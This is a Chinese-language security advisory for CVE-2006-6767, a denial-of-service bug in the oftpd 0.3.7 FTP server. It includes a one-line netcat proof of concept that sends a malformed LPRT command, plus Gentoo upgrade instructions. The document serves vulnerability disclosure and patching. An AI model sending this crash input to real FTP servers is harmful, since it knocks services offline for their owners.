oftpd LPSV及LPRT命令拒绝服务漏洞
发布日期:2007-01-16
更新日期:2007-01-17
受影响系统:oftpd oftpd 0.3.7
描述:
BUGTRAQ ID:
22073
CVE(CAN) ID:
CVE-2006-6767
oftpd是一款FTP服务程序。
oftpd在处理畸形的LPSV和LPRT命令参数时存在拒绝服务漏洞,远程攻击者可能利用此漏洞导致进程崩溃。
如果上述命令参数数据中包含有不支持的地址家族的话,就会触发异常失败,导致oftpd终止。
<*来源:Tavis Ormandy (
taviso@gentoo.org)
链接:
http://secunia.com/advisories/23790/
http://www.gentoo.org/security/en/glsa/glsa-200701-09.xml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
nc www.example.com 21 <<< "LPRT
1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176"
220 Service ready for new user.
521 Only IPv4 supported, address family (4)
建议:
厂商补丁:
Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA 200701-09)以及相应补丁:
GLSA 200701-09:oftpd: Denial of Service
链接:
http://www.gentoo.org/security/en/glsa/glsa-200701-09.xml
所有oftpd用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-ftp/oftpd-0.3.7-r3"
浏览次数:3097
严重程度:0(网友投票)
